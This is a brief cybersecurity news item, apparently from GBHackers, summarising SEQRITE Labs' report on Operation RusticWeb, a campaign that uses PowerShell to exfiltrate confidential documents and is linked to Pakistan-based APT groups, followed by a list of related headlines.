Operation RusticWeb Using PowerShell Commands to Exfiltrate Confidential Documents

23 December 2023

Hackers use PowerShell commands because they provide a powerful scripting environment on Windows systems, allowing them to stealthily execute malicious scripts and commands called Operation RusticWeb. While besides this, the PowerShell’s capabilities make it an attractive tool for gaining:- Unauthorized access Performing reconnaissance Executing various cyber attacks Cybersecurity researchers at SEQRITE Labs recently identified operation RusticWeb, in which they found threat actors using PowerShell commands to exfiltrate confidential documents. RusticWeb Using PowerShell The operation RusticWeb tracks overlapping tactics with Pakistan-linked APT groups like- APT36 SideCopy While threat actors shift from compiled languages to the following languages for cross-compatibility and evasive tactics:- Golang Rust Nim Golang malware examples include Windows-based Warp with Telegram bot C2 and Linux-based Ares RAT stager payload.

Source: GBHackers

Date:

23 December 2023

Categorie(s):

NEWS

Tag(s):

Commands, Confidential, Cyber Security News, Documents, Malware

Discord dismantles Spy.pet site that snooped on millions of users29 April 2024
Securing the future of IoT: Why attack surface management is key29 April 2024
No more 12345: devices with weak passwords to be banned in UK28 April 2024
20 Best Linux Password Managers in 202428 April 2024
Reliable Web App Pattern: Now Optimizes Azure Migration with Enhanced Infrastructure and Security28 April 2024